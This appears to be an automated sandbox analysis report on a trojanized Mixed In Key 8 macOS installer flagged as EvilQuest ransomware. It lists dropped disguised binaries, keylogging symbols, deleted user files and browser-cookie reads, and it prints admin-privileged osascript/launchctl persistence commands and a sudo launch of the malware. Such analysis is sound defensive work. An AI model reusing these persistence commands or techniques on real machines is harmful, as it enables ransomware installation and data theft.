6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20

Source: postinstall, 00000633.00000319.1.000000010fbe2000.000000010fbed000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: .BC.T_P7av4Y.291.dr	String found in binary or memory: http://crl.apple.com/root.crl0
Source: .BC.T_P7av4Y.291.dr	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: .BC.T_YLkrs1.291.dr	String found in binary or memory: http://developer.kde.org/~wheeler/taglib.html
Source: .BC.T_YLkrs1.291.dr	String found in binary or memory: http://developer.kde.org/~wheeler/taglib/
Source: .BC.T_xnUU2w.291.dr	String found in binary or memory: http://developer.kde.org/~wheeler/taglib/api/
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://flow8deck.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
Source: .BC.T_pNEyuA.291.dr	String found in binary or memory: http://home.pcisys.net/~melanson/codecs/mp3extensions.txt
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://mashup.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
Source: .BC.T_mx7dic.291.dr	String found in binary or memory: http://musicbrainz.org
Source: .BC.T_P7av4Y.291.dr	String found in binary or memory: http://ocsp.apple.com/ocsp-devid010
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://odesi.mixedinkey.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mikhttp://www.platinumn
Source: .BC.T_oAO95V.291.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: .BC.T_pnZgQG.291.dr, .BC.T_1N2tbP.291.dr, .BC.T_ihC20x.291.dr, .BC.T_LzwW9f.291.dr, .BC.T_GuNU5P.291.dr, .BC.T_9KYgzf.291.dr, .BC.T_oAO95V.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: .BC.T_r7aTLv.291.dr, .BC.T_T7LfAr.291.dr, .BC.T_dCYuLS.291.dr, .BC.T_YimtvX.291.dr, .BC.T_pdEYlM.291.dr, .BC.T_fMWw4g.291.dr, .BC.T_pnZgQG.291.dr, .BC.T_1N2tbP.291.dr, .BC.T_ihC20x.291.dr, .BC.T_LzwW9f.291.dr, .BC.T_GuNU5P.291.dr, .BC.T_9KYgzf.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Copyright
Source: .BC.T_T7LfAr.291.dr, .BC.T_1N2tbP.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoBlack
Source: .BC.T_ihC20x.291.dr, .BC.T_GuNU5P.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoLight
Source: .BC.T_LzwW9f.291.dr, .BC.T_9KYgzf.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoMedium
Source: .BC.T_dCYuLS.291.dr, .BC.T_fMWw4g.291.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoThin
Source: postinstall, 00000633.00000319.1.000000010fbe2000.000000010fbed000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: postinstall, 00000633.00000319.1.000000010fbe2000.000000010fbed000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: .BC.T_P7av4Y.291.dr	String found in binary or memory: http://www.apple.com/appleca0
Source: postinstall, 00000633.00000319.1.000000010fbe2000.000000010fbed000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: .BC.T_6kMUxA.291.dr	String found in binary or memory: http://www.daemonology.net/bsdiff/
Source: .BC.T_YLkrs1.291.dr	String found in binary or memory: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html
Source: .BC.T_0xZv2r.291.dr	String found in binary or memory: http://www.id3.org/ID3v1
Source: .BC.T_0xZv2r.291.dr	String found in binary or memory: http://www.id3.org/id3v2.4.0-frames
Source: .BC.T_w7CuRX.291.dr	String found in binary or memory: http://www.midi.org/techspecs/gm1sound.php
Source: .BC.T_jNE5sR.291.dr	String found in binary or memory: http://www.midi.org/techspecs/manid.php
Source: .BC.T_IhbC26.291.dr	String found in binary or memory: http://www.midi.org/techspecs/midimessages.php
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: http://www.mixedinkey.com/
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://www.mixedinkey.com/Book/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
Source: .BC.T_93W6fe.291.dr	String found in binary or memory: http://www.mozilla.org/MPL/
Source: .BC.T_YLkrs1.291.dr	String found in binary or memory: http://www.mozilla.org/MPL/MPL-1.1.html
Source: .BC.T_4W3rGF.291.dr	String found in binary or memory: http://www.mp3-tech.org/programmer/frame_header.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: http://www.platinumnotes.com/?utm_source=mik8_mac&utm_medium=mac&utm_campaign=mik8_mac
Source: .BC.T_WgbOrP.291.dr	String found in binary or memory: http://www.xiph.org
Source: .BC.T_Sj0766.291.dr	String found in binary or memory: https://builds.mixedinkey.com/appcasts/%ld/%
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://community.mixedinkey.com
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://community.mixedinkey.com/BlogPosts/Categories/News/
Source: .BC.T_Z9xX8s.291.dr	String found in binary or memory: https://github.com/mixedinkey-opensource/MIKMIDI/issues/2
Source: .BC.T_syQVRJ.291.dr	String found in binary or memory: https://github.com/mixedinkey-opensource/MIKMIDI/issues/216
Source: .BC.T_syQVRJ.291.dr	String found in binary or memory: https://github.com/mixedinkey-opensource/MIKMIDI/issues/76
Source: .BC.T_cYRDEO.291.dr	String found in binary or memory: https://github.com/mixedinkey-opensource/MIKMIDI/wiki/Adding-Audio-to-UIBackgroundModes
Source: .BC.T_YLkrs1.291.dr	String found in binary or memory: https://mail.kde.org/mailman/listinfo/taglib-devel
Source: .BC.T_xnUU2w.291.dr	String found in binary or memory: https://mikteam.atlassian.net/wiki/display/MT/How
Source: .BC.T_FO3DQw.291.dr	String found in binary or memory: https://mikteam.fogbugz.com/default.asp?W76
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/master-collection/
Source: .BC.T_QSX9s3.291.dr	String found in binary or memory: https://mixedinkey.com/privacy-policy/
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/abletonIntegration.htmlhttps://mixedinkey.com/tutorial
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/harmonicMixing101.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/iTunesIntegration.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/pioneerIntegration.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/seratoIntegration.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/startHere.html
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://mixedinkey.com/tutorials/mixed-in-key/traktorIntegration.html
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: https://news.mixedinkey.com/api/news/channels/searchbyvipcode?vipCode=%
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: https://news.mixedinkey.com/api/news/unreadcount?channels=%
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: https://news.mixedinkey.com/news?theme=MIK&channels=%
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://online5.mixedinkey.com/Services/Analysis/AnalyzeSong
Source: .BC.T_qhmt0Y.291.dr	String found in binary or memory: https://online5.mixedinkey.com/Services/Analysis/LatestAlgorithmVersions
Source: .BC.T_qhmt0Y.291.dr	String found in binary or memory: https://online5.mixedinkey.com/Services/Analysis/LatestAlgorithmVersionsv32
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://online5.mixedinkey.com/Services/License/CheckLicense
Source: .BC.T_yHpOuA.291.dr	String found in binary or memory: https://online5.mixedinkey.com/Services/UserFeedback/Feedback
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: https://ssl.google-analytics.com/collect
Source: .BC.T_Wq6vpD.291.dr	String found in binary or memory: https://ssl.google-analytics.com/collectv=1&tid=%
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://www.MixedInKey.com/PrivacyPolicy
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://www.MixedInKey.com/downloads.aspx
Source: postinstall, 00000633.00000319.1.000000010fbe2000.000000010fbed000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://www.google.com
Source: .BC.T_yHpOuA.291.dr	String found in binary or memory: https://www.mixedinkey.com
Source: .BC.T_yHpOuA.291.dr	String found in binary or memory: https://www.mixedinkey.com/BuyMacOSX.aspx?S=App
Source: .BC.T_yHpOuA.291.dr	String found in binary or memory: https://www.mixedinkey.com/DownloadMacOSX.aspx?Version=Original&VIP=%
Source: .BC.T_HCcfBJ.291.dr	String found in binary or memory: https://www.mixedinkey.com/PrivacyPolicy
Source: .BC.T_yHpOuA.291.dr	String found in binary or memory: https://www.mixedinkey.com/recovery

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 443

Source: /Library/mixednkey/toolroomd (PID: 639)	Writes from socket in process: data
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Writes from socket in process: data

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality related to key logging

Show sources

Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _CGEventTapEnable
Source: extracted submission file Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _CGEventTapCreate
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _CGEventTapCreate
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _CGEventTapEnable
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _CGEventTapCreate

Spam, unwanted Advertisements and Ransom Demands:

Detected macOS EvilQuest ransomware

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	IOC file dropped: /Library/AppQuest/com.apple.questd	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	IOC file dropped: /Users/berri/Library/AppQuest/com.apple.questd
Source: /Library/mixednkey/toolroomd (PID: 639)	IOC file dropped: /Users/berri/Library/LaunchAgents/com.apple.questd.plist	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	IOC file dropped: /private/var/root/Library/AppQuest/com.apple.questd	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	IOC file dropped: /private/var/root/Library/LaunchAgents/com.apple.questd.plist	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	IOC file dropped: /Users/berri/Library/AppQuest/com.apple.questd	Jump to dropped file

Yara detected EvilQuest Ransomware

Show sources

Source: Yara match	File source: patch, type: SAMPLE
Source: Yara match	File source: /Users/berri/Library/AppQuest/com.apple.questd, type: DROPPED
Source: Yara match	File source: /private/var/root/Library/.osPtRL91w, type: DROPPED
Source: Yara match	File source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Utils/.BC.T_nXMCY0, type: DROPPED
Source: Yara match	File source: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Scripts/com.mixedinkey.installer.tVvVCe/Utils/.BC.T_EdCtGl, type: DROPPED
Source: Yara match	File source: /Users/berri/Library/.b0MbtGgfS, type: DROPPED
Source: Yara match	File source: /Library/AppQuest/com.apple.questd, type: DROPPED
Source: Yara match	File source: /Users/berri/Library/AppQuest/com.apple.questd, type: DROPPED
Source: Yara match	File source: /Library/AppQuest/com.apple.questd, type: DROPPED

Deletes many files in the user directory

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.CFUserTextEncoding	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/0ACF1266-122A-4730-BFD0-867CC672C2A0.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/0ACF1266-122A-4730-BFD0-867CC672C2A0.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/0D642B43-9BB3-488B-80BD-D05FB68E4734.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/1DB5D13B-EACB-4682-B24B-3BF03D1C8158.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/20B81DCB-1DD8-44AC-B8F3-B1BEFDBB8F8B.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/28E0383D-4BF4-4BA9-ACA9-48F75870E979.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/28E0383D-4BF4-4BA9-ACA9-48F75870E979.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/2B0C6524-704B-43C0-B3BA-070EA2C35A52.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/2B0C6524-704B-43C0-B3BA-070EA2C35A52.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3113CAFA-7936-427F-AFB4-559C95AD7B13.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3113CAFA-7936-427F-AFB4-559C95AD7B13.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3C05F24B-D303-483D-AC12-ECD1041930EB.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3C05F24B-D303-483D-AC12-ECD1041930EB.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/3F4F72D9-982B-4DDE-BE57-0F410DB9FD5D.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/44E5E857-A87B-40B0-9C16-BE47EEE10853.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/44E5E857-A87B-40B0-9C16-BE47EEE10853.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/4F1B0166-6094-4AC7-BDC1-19AD07F91616.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/4F1B0166-6094-4AC7-BDC1-19AD07F91616.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/53850C24-44F5-4CD9-B391-C3DB18E01593.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/53850C24-44F5-4CD9-B391-C3DB18E01593.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/639B602D-9E09-436A-BFD7-D5C62C5DBF82.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/6926BE27-BCE7-4C7E-8FFB-89D9EC78F11A.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/849B4B4C-DBBA-480B-BFF5-006FCCE558FA.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/98615EBB-D2DF-45F6-8D34-499F9098DE29.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/A1C22BEB-F57B-44E1-9470-D26CBCE7DD06.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/B265C232-627B-4790-A8B8-B3822113C54A.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/B265C232-627B-4790-A8B8-B3822113C54A.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/C60309AD-9AF3-409D-ADC5-AEF264639E02.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/C60309AD-9AF3-409D-ADC5-AEF264639E02.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/D633C10E-C2FC-4A25-8A88-85C03207AF10.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/E499D2F8-4CBA-464F-AD65-1B3663DD9343.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/E499D2F8-4CBA-464F-AD65-1B3663DD9343.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/E644371A-2504-4862-8E9A-B0D3FB6EE159.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/E644371A-2504-4862-8E9A-B0D3FB6EE159.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/F01EAF3E-0906-4403-806A-CA639D38E2A8.history	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/.bash_sessions/F01EAF3E-0906-4403-806A-CA639D38E2A8.historynew	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	User file deleted: /Users/berri/Desktop/Mixed In Key 8.pkg	Jump to behavior

Source: classification engine

Classification label: mal100.rans.spyw.expl.evad.macPKG@0/1672@2/0

Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _ei_forensic_sendfile
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _set_important_files
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _http_request_f
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: _http_request
Source: extracted file from submission Mixed_In_Key_8.pkg/Scripts/Utils/patch	Mach-O symbol: __react_ping
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _set_important_files
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _http_request_f
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: _http_request
Source: dropped file .BC.T_EdCtGl.291.dr	Mach-O symbol: __react_ping
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _set_important_files
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _http_request_f
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: _http_request
Source: dropped file .b0MbtGgfS.330.dr	Mach-O symbol: __react_ping
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _set_important_files
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _http_request_f
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: _http_request
Source: dropped file com.apple.questd.330.dr	Mach-O symbol: __react_ping
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _set_important_files
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _http_request_f
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: _http_request
Source: dropped file com.apple.questd0.330.dr	Mach-O symbol: __react_ping
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _set_important_files
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _http_request_f
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: _http_request
Source: dropped file .osPtRL91w.349.dr	Mach-O symbol: __react_ping
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _set_important_files
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _http_request_f
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: _http_request
Source: dropped file com.apple.questd.349.dr	Mach-O symbol: __react_ping
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _ei_forensic_sendfile
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _set_important_files
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _http_request_f
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: _http_request
Source: dropped file com.apple.questd0.349.dr	Mach-O symbol: __react_ping

Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: submission	Mach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Executes shell scripts with administrative rights

Show sources

Source: /bin/sh (PID: 642)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 648)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 652)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 656)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 672)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 680)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 684)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 688)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 692)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 696)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 723)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 731)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 660)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 664)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 668)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 673)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 700)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 704)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 708)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 712)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 716)	Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

Executes the "sudo" command used to execute a command as another user

Show sources

Source: /usr/libexec/xpcproxy (PID: 645)

Sudo executable: /usr/bin/sudo -> sudo /Library/AppQuest/com.apple.questd --silent

Reads local browser cookies

Show sources

Source: /Library/mixednkey/toolroomd (PID: 639)	Binary cookie file read: /Users/berri/Library/Cookies/Cookies.binarycookies	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Binary cookie file read: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/Cookies.binarycookies	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Binary cookie file read: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/Cookies.binarycookies
